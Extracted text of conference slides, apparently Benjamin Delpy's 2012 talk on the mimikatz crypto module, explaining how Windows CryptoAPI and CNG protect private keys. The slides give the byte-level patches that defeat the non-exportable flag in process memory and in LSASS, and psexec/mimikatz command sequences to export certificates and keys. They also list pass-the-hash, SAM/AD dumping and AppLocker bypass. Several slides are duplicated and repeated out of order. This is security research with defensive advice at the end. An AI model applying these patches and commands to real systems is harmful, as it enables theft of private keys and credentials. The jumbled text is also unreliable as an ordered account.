A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
